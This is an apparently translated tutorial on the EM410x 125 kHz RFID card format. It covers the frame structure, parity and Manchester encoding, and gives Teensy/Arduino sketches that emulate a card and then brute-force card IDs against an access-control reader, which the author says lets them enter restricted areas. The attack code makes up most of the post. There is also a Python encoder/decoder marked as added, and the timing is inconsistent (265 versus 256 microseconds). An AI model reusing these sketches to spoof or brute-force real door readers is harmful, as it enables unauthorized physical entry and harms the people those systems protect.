Using a Teensy for EM410x card emulation and brute-forcing an EM410x access control system: a feasibility conjecture

Source: Internet
Author: User

A few days ago I started emulating EM410x cards with a Teensy++ 2.0 and ran a brute-force test against an EM410x access control system. The relevant code and notes follow.

What is low frequency? What is em410x?

First of all, I have to say something about the low-frequency cards that work at 125 kHz (such as the EM410x), so that the rest of this article is easier to follow.

What is low frequency? Here is the explanation:

Low frequency (LF) refers to radio waves in the 30 kHz to 300 kHz band. Some radio frequency identification (RFID) tags use low frequency; these tags are often referred to as LFID's or LowFID's (low-frequency identification).

The frequency commonly (but not exclusively) used by LFID/LowFID tags is 125 kHz/134 kHz. 125 kHz/134 kHz is only the carrier frequency that low-frequency RFID is built on; the frequency itself has no functionality, that is, there is no such thing as ID recognition, reading or writing at the level of the frequency. Commonly used low-frequency cards include the HID, T55xx and EM410x series, which everyone meets in daily life. This time we are talking about the EM410x series, which uses 125 kHz for access-control ID recognition.

The following is the EM410x format:

1 1 1 1 1 1 1 1 1              9-bit header
D00 D01 D02 D03 P0   \   8-bit version or vendor ID
D10 D11 D12 D13 P1   /
D20 D21 D22 D23 P2   \
D30 D31 D32 D33 P3   |
D40 D41 D42 D43 P4   |
D50 D51 D52 D53 P5   |   32-bit data
D60 D61 D62 D63 P6   |
D70 D71 D72 D73 P7   |
D80 D81 D82 D83 P8   |
D90 D91 D92 D93 P9   /
PC0 PC1 PC2 PC3 S0       4-bit column parity, stop bit

P0-P9: 10-bit row parity

The 64 bits of data begin with 9 consecutive 1s; D00-D93 is the user data, P0-P9 are the row parity bits, PC0-PC3 are the column parity bits, and S0 is the stop bit marking the end of the data.

In simple terms, parity records whether the number of 1s in the data is odd or even.

For example: 0x01 in binary is 0001, and the number of 1s in this data is odd; with even parity it should become 00011, so that the total number of 1s is even. If the data is 1110, even parity of course gives 11101; conversely, with odd parity it would be 11100.

The following practical example illustrates the EM410x format:

If I have an EM410x card, the ID printed on the card will be:

0005206306

If you read it with a Proxmark3 or another low-frequency reader, you will see that the ID has two extra hex digits in front, which are most likely the 8-bit version, vendor or user ID. If we read the ID with a Proxmark3 it is:

0x0600503472

Here 0x00503472 corresponds to 5206306, and 0x06 is the identifier. What does its frame look like? See the following analysis:

First the data header:

111111111

Card number data and row parity bit:

0 = 0000 0

6 = 0110 0

0 = 0000 0

0 = 0000 0

5 = 0101 0

0 = 0000 0

3 = 0011 0

4 = 0100 1

7 = 0111 1

2 = 0010 1

p = 0001 (column parity bits)

0 = stop bit

From the above we therefore get the following 64-bit value:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

This is the EM410x format. If anything is unclear, please use Google or another search engine to look it up. Next, let's talk about how to use the Teensy to emulate an EM410x tag.

Hardware component list:

1. 125 kHz low-frequency coil

2. Capacitor

3. Transistor 2N3904

4. Resistor 10K

5. Teensy++ 2.0, to which the following code is written; of course you can also use an Arduino development board.

// Teensy++ 2.0 EM410x emulation code:
//
// sstart is the 9-bit header "111111111" followed by the version/vendor byte
// 0x00, sent as two rows of "0000" plus a 0 row parity bit. (The worked example
// above uses version 0x06; change these ten bits for a different version byte.)
String sstart = "1111111110000000000";
String sstop = "0";                     // stop bit S0
int data_to_spoof[64];                  // the 64 frame bits, one per element
int coil_pin = 9;
int a, b, c, d;                         // ones-count per column (bit 3 .. bit 0) for PC0-PC3
unsigned long id;
char hexcode[9];                        // 8 hex digits plus the terminating NUL

void setup()
{
  Serial.begin(9600);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  id = 0x503472;
  a = 0; b = 0; c = 0; d = 0;
  sprintf(hexcode, "%08lX", id);        // 32-bit ID as 8 hex digits, most significant first
  String s = sstart;
  for (int i = 0; i < 8; i++) {
    s += em4xcode(hexcode[i]);          // each hex digit: 4 data bits + row parity
  }
  s += evenparity(a) + evenparity(b) + evenparity(c) + evenparity(d) + sstop;
  Serial.println(s);
  tocode(s);
}

// Drive one Manchester half-bit: level = clock_half XOR data bit,
// so a 1 is sent as 10 and a 0 as 01.
void set_pin_manchester(int clock_half, int signal)
{
  int man_encoded = clock_half ^ signal;
  if (man_encoded == 1) {
    digitalWrite(coil_pin, HIGH);
  } else {
    digitalWrite(coil_pin, LOW);
  }
}

// One hex digit -> its 4 data bits (MSB first) plus an even row parity bit.
// Also counts the ones in each column for the column parity computed later.
String em4xcode(char code)
{
  switch (toupper(code)) {
    case '1': d++;                return "00011";
    case '2': c++;                return "00101";
    case '3': c++; d++;           return "00110";
    case '4': b++;                return "01001";
    case '5': b++; d++;           return "01010";
    case '6': b++; c++;           return "01100";
    case '7': b++; c++; d++;      return "01111";
    case '8': a++;                return "10001";
    case '9': a++; d++;           return "10010";
    case 'A': a++; c++;           return "10100";
    case 'B': a++; c++; d++;      return "10111";
    case 'C': a++; b++;           return "11000";
    case 'D': a++; b++; d++;      return "11011";
    case 'E': a++; b++; c++;      return "11101";
    case 'F': a++; b++; c++; d++; return "11110";
    default:                      return "00000";   // '0' (or anything unexpected)
  }
}

// Even parity: the parity bit is 1 when the number of ones is odd.
String evenparity(int ones)
{
  if ((ones % 2) == 1) return "1";
  return "0";
}

// Copy the 64-character bit string into the data_to_spoof array.
void tocode(String s)
{
  for (int i = 0; i < 64; i++) {
    if (s[i] == '0') { data_to_spoof[i] = 0; } else { data_to_spoof[i] = 1; }
  }
}

// Send the frame continuously: each bit takes two 256 us halves (512 us total).
void loop()
{
  for (int i = 0; i < 64; i++) {
    set_pin_manchester(0, data_to_spoof[i]);
    delayMicroseconds(256);
    set_pin_manchester(1, data_to_spoof[i]);
    delayMicroseconds(256);
  }
}

What needs to be pointed out here is that you may not understand why the data is sent this way. The reason is that it is Manchester encoded, so let me explain that in plain terms as well.

For example, to send the 64 bits of data:

111111111 00000 01100 00000 00000 01010 00000 00110 01001 01111 00101 00010

How long does it take to send one bit? The answer: 64 carrier cycles at 125 kHz equal 512 us, which means one bit is sent every 512 us. But Manchester code represents each bit with 2 symbols: if the data bit is 1 the Manchester code is 10, and if the data bit is 0 the Manchester code is 01. So when a data bit that takes 512 us is converted into Manchester code, each half should take 512 us / 2 = 256 us. The program converts the 64-bit data into Manchester code and sends it, so the sending interval is delayMicroseconds(256).
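The frame construction from the format section and the Manchester timing just described, as an added Python example that is not part of the original post: an encoder that builds the 64-bit frame from a 10-hex-digit ID (version byte plus 8-digit ID), a decoder that rejects any frame whose header, row parity, column parity or stop bit is wrong (the checks a reader must pass before trusting an ID), and the expansion to Manchester half-bit levels with the 256 us timing. The function names are my own, and the frame constant is the worked example above.

```python
# Added example (not from the original post): EM410x frame encode/decode with
# the row and column parity the format defines, plus Manchester expansion.
HEADER = "1" * 9          # 9 consecutive ones mark the start of a frame
HALF_BIT_US = 256         # 64 carrier cycles at 125 kHz = 512 us per bit, 256 us per half

def em410x_encode(id_hex):
    """10 hex digits (version/vendor byte + 8-digit ID) -> 64-character bit string."""
    if len(id_hex) != 10:
        raise ValueError("an EM410x frame carries 10 hex digits (40 bits)")
    bits = HEADER
    col = [0, 0, 0, 0]                                   # running ones-count per column
    for h in id_hex:
        n = int(h, 16)
        row = [(n >> s) & 1 for s in (3, 2, 1, 0)]       # 4 data bits, MSB first
        for i, b in enumerate(row):
            col[i] ^= b
        bits += "".join(map(str, row)) + str(sum(row) % 2)   # data + even row parity
    return bits + "".join(map(str, col)) + "0"           # column parity + stop bit

def em410x_decode(bits):
    """64-character bit string -> 10 hex digit ID, or None if any check fails."""
    if len(bits) != 64 or not bits.startswith(HEADER) or bits[63] != "0":
        return None                                      # bad length, header or stop bit
    rows = [[int(b) for b in bits[9 + 5 * r:14 + 5 * r]] for r in range(10)]
    for row in rows:
        if sum(row[:4]) % 2 != row[4]:
            return None                                  # row parity mismatch
    for c in range(4):
        if sum(row[c] for row in rows) % 2 != int(bits[59 + c]):
            return None                                  # column parity mismatch
    return "".join("%X" % int("".join(map(str, row[:4])), 2) for row in rows)

def manchester(bits):
    """Each bit -> two (level, microseconds) halves: level = clock_half XOR bit."""
    out = []
    for b in bits:
        out.append((0 ^ int(b), HALF_BIT_US))            # first half
        out.append((1 ^ int(b), HALF_BIT_US))            # second half
    return out

# The 64-bit frame worked out by hand in the text above (card 0x0600503472).
PAGE_FRAME = ("111111111" "00000" "01100" "00000" "00000" "01010"
              "00000" "00110" "01001" "01111" "00101" "00010")

if __name__ == "__main__":
    assert em410x_encode("0600503472") == PAGE_FRAME
    print(em410x_decode(PAGE_FRAME))        # 0600503472
    print(manchester("10"))                 # [(1, 256), (0, 256), (0, 256), (1, 256)]
```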

When we used the Teensy for this emulation, we found that as long as we run the relevant exhaustive test we can break through the restrictions of the access control system and enter the restricted area fairly quickly. In the test environment, because the reader showed no read delay, we could enumerate the relevant tag IDs very quickly; but because every access control system has its own settings and environmental factors, we are not sure whether the exhaustive code below suits everyone, so we only put forward a feasibility conjecture in writing this article.

The following is the brute-force test program code:


// Same frame layout as the emulation sketch: 9-bit header + version/vendor byte 0x00.
String sstart = "1111111110000000000";
String sstop = "0";
int data_to_spoof[64];
int led = 6;
int coil_pin = 9;
int a, b, c, d;                         // ones-count per column for the column parity
unsigned long id;
char hexcode[9];                        // 8 hex digits plus the terminating NUL

void setup()
{
  // Serial.begin(9600);
  pinMode(led, OUTPUT);
  pinMode(coil_pin, OUTPUT);
  digitalWrite(coil_pin, LOW);
  id = 0x502e96;                        // starting ID of the exhaustive test
}

void set_pin_manchester(int clock_half, int signal)
{
  int man_encoded = clock_half ^ signal;
  if (man_encoded == 1) {
    digitalWrite(coil_pin, HIGH);
  } else {
    digitalWrite(coil_pin, LOW);
  }
}

// One hex digit -> 4 data bits plus even row parity; counts ones per column.
String em4xcode(char code)
{
  switch (toupper(code)) {
    case '1': d++;                return "00011";
    case '2': c++;                return "00101";
    case '3': c++; d++;           return "00110";
    case '4': b++;                return "01001";
    case '5': b++; d++;           return "01010";
    case '6': b++; c++;           return "01100";
    case '7': b++; c++; d++;      return "01111";
    case '8': a++;                return "10001";
    case '9': a++; d++;           return "10010";
    case 'A': a++; c++;           return "10100";
    case 'B': a++; c++; d++;      return "10111";
    case 'C': a++; b++;           return "11000";
    case 'D': a++; b++; d++;      return "11011";
    case 'E': a++; b++; c++;      return "11101";
    case 'F': a++; b++; c++; d++; return "11110";
    default:                      return "00000";   // '0' (or anything unexpected)
  }
}

String evenparity(int ones)
{
  if ((ones % 2) == 1) return "1";
  return "0";
}

void tocode(String s)
{
  for (int i = 0; i < 64; i++) {
    if (s[i] == '0') { data_to_spoof[i] = 0; } else { data_to_spoof[i] = 1; }
  }
}

// Build the frame for the current ID, send it, then move on to the next ID.
void loop()
{
  a = 0; b = 0; c = 0; d = 0;
  sprintf(hexcode, "%08lX", id);        // 32-bit ID as 8 hex digits, most significant first
  String s = sstart;
  for (int i = 0; i < 8; i++) {
    s += em4xcode(hexcode[i]);
  }
  s += evenparity(a) + evenparity(b) + evenparity(c) + evenparity(d) + sstop;
  // Serial.println(s);
  tocode(s);
  for (int ii = 0; ii < 2; ii++) {      // send the frame twice per ID
    for (int i = 0; i < 64; i++) {
      set_pin_manchester(0, data_to_spoof[i]);
      delayMicroseconds(265);           // the explanation above derives 256 us per half-bit
      set_pin_manchester(1, data_to_spoof[i]);
      delayMicroseconds(265);
    }
  }
  if (id == 0x50308a) {                 // marker ID for the test run: light the LED
    digitalWrite(led, HIGH);
  }
  id += 1;                              // unsigned long wraps back to 0 after 0xFFFFFFFF
}
